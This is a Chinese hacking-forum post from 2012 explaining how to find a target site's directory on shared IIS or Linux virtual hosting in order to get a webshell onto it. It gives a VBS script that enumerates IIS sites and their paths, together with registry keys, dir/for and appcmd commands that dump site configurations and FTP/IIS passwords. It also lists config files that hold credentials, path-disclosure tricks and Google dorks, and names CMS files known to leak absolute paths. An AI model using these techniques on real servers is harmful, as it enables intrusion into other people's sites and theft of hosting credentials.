灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:3399回复:0

详谈如何找到目标站目录

楼主#
更多 发布于:2012-11-26 14:25
qq:yueyan@f4ck.net

在有目标站的情况下,有很大程度上是不用花大心思去提权的,直接找到目标站目录,通过一些手段获得shell。本文只针对虚拟主机搭建多个网站的情况说明。

0x01 通过vbs查看iis配置文件
0x02 通过注册表找到目录列表
0x03 通过dir或者for命令
0x04appcmd在渗透中的应用
0x05winlinux配置文件找路径
0x06 目标站爆路径
0x07  附录

0x01 通过vbs查看iis配置文件

脚本如下:

SetObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w Inobjservice
If IsNumeric(obj3w.Name)Then
sServerName=Obj3w.ServerComment
Set webSite =GetObject("IIS://Localhost/W3SVC/" ; obj3w.Name ; "/Root")
ListAllWeb= ListAllWeb ; obj3w.Name ; String(25-Len(obj3w.Name)," ") ;obj3w.ServerComment ; "(" ; webSite.Path ; ")" ; vbCrLf
EndIf
Next
WScript.Echo ListAllWeb
SetObjService=Nothing
WScript.Quit

执行命令:cscriptC:\xxx\列目录.vbs
这是通过查看iis配置文件获取目标站信息。
由于木有找到合适的网站截图,这里引用别人原来截的图:

图片:20121125095644743.jpg


基本信息是网站id,网站名称,网站路径

这里还介绍一款vbs,可以列出网站的iis用户名和密码,然后使用bs大牛写的webshell来跨目录。
Adsutil.vbs


0x02 通过注册表找到目录列表
这里介绍一个我常用的一个注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\VirtualRoots

图片:20121125095644782.jpg


0x03 通过dir或者for命令

首先是dir命令,可能很多机油觉得虚拟主机上一般是没有dir命令权限。
但是我实战中却却常常能够碰见:
dird:\wwwroot\如图:

图片:20121125095644276.jpg



虽然不能访问d:\wwwroot\这个目录,但是却能列出详细信息

for命令对用户权限要求是最低的,大多数情况下是可以执行了for/d %i in (d:\wwwroot\*) do @echo %i
如图:

图片:20121125095645973.jpg



0x04appcmd在渗透中的应用
appcmd是微软iis7的一款命令行下的管理web的工具。他的使用可以在渗透中取得一些关键应用
这里我就讲对web渗透实用的几个命令。其他的命令我都测试过了,基本是权限不够。

appcmdlist site
列出站点及其id号:

图片:20121125095645946.jpg



Ctrl+A全选后保存在文本中,搜索目标站:

图片:20121125095645975.jpg



在新网虚拟主机中的web目录构造就是以id好构造的于是的到目标目录:
D:\virtualHost\web332419\www




第二个命令:
appcmdlist config
列出所有网站配置信息,如果是在iis7上配置的ftp,则还会列出网站ftp用户及密码

图片:20121125095646944.jpg




Ctrl+A全选后保存在文本中,搜索目标站:

图片:20121125095646833.jpg


可以从图中看出,配置文件中有站点id号,iis用户名及密码,以及日志文件的路径。



第三条命令:
appcmdlist vdir
该条命令可以列出id号和所有站点的目录:


图片:20121125095647406.jpg




第一条命令和第三条命令可以成功找到目标站点对应目录。

第二条命令可以直接找到对应站点的ftp和iis密码,可以联合bs牛的马直接跨到目标站点目录。

0x05winlinux配置文件找路径

各平台下Web服务器和PHP的配置文件默认路径可以上网查,这里列举常见的几个。
Windows:c:\windows\php.ini                                    php配置文件
c:\windows\system32\inetsrv\MetaBase.xml              IIS虚拟主机配置文件
C:\ProgramFiles\RhinoSoft.com\Serv-U\c:\ProgramFiles\Serv-U\ServUDaemon.ini 中存储了虚拟主机网站路径和密码

Linux:
/etc/php.ini                                           php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf                             Apache配置文件
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf         虚拟目录配置文件





0x06 目标站爆路径
单引号:如果网站容错没有配置好就会爆出路径,用单引号等测试常见的aspx,iis7,php都很普遍。
对于php:
直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。www.atcpu.com/news.php?id=149



测试文件爆路径:
很多网站的根目录下都存在测试文件,脚本代码通常都是phpinfo()。
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.atcpu.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php

google爆路径:
结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatalerror。
注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。
Site:xxx.edu.twwarning
Site:xxx.com.tw “fatalerror”

下面是一些常见的建站系统爆绝对路径漏洞:dz2.5:uc_server/control/admin/db.php
source/plugin/myrepeats/table/table_myrepeats.php
install/include/install_lang.php
dzx2:/source/function/function_connect.php
shopex:install/install.core.php
wordpress:


phpmyadmin:phpmyadmin/themes/darkblue_orange/layout.inc.phppphpmyadmin/libraries/export/xls.php
dedecms:
/member/templets/menulit.php
plus/paycenter/alipay/return_url.php
plus/paycenter/cbpayment/autoreceive.php
paycenter/nps/config_pay_nps.php
plus/task/dede-maketimehtml.php
plus/task/dede-optimize-table.php
plus/task/dede-upcache.php

ecshop:
/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
、、、、、、、
z-blog
admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php

ucenter:
ucenter\control\admin\db.php


0x07  附录
如果有对iis命令行下的管理工具继续研究的机油请猛戳下面几篇介绍:
appcmd(iis7)微软官方介绍
IIS 管理脚本之 adsutil.vbs 的使用
如何在 IIS6.0 中使用命令行脚本管理网站和 Web 虚拟目录

喜欢0 评分0
游客

返回顶部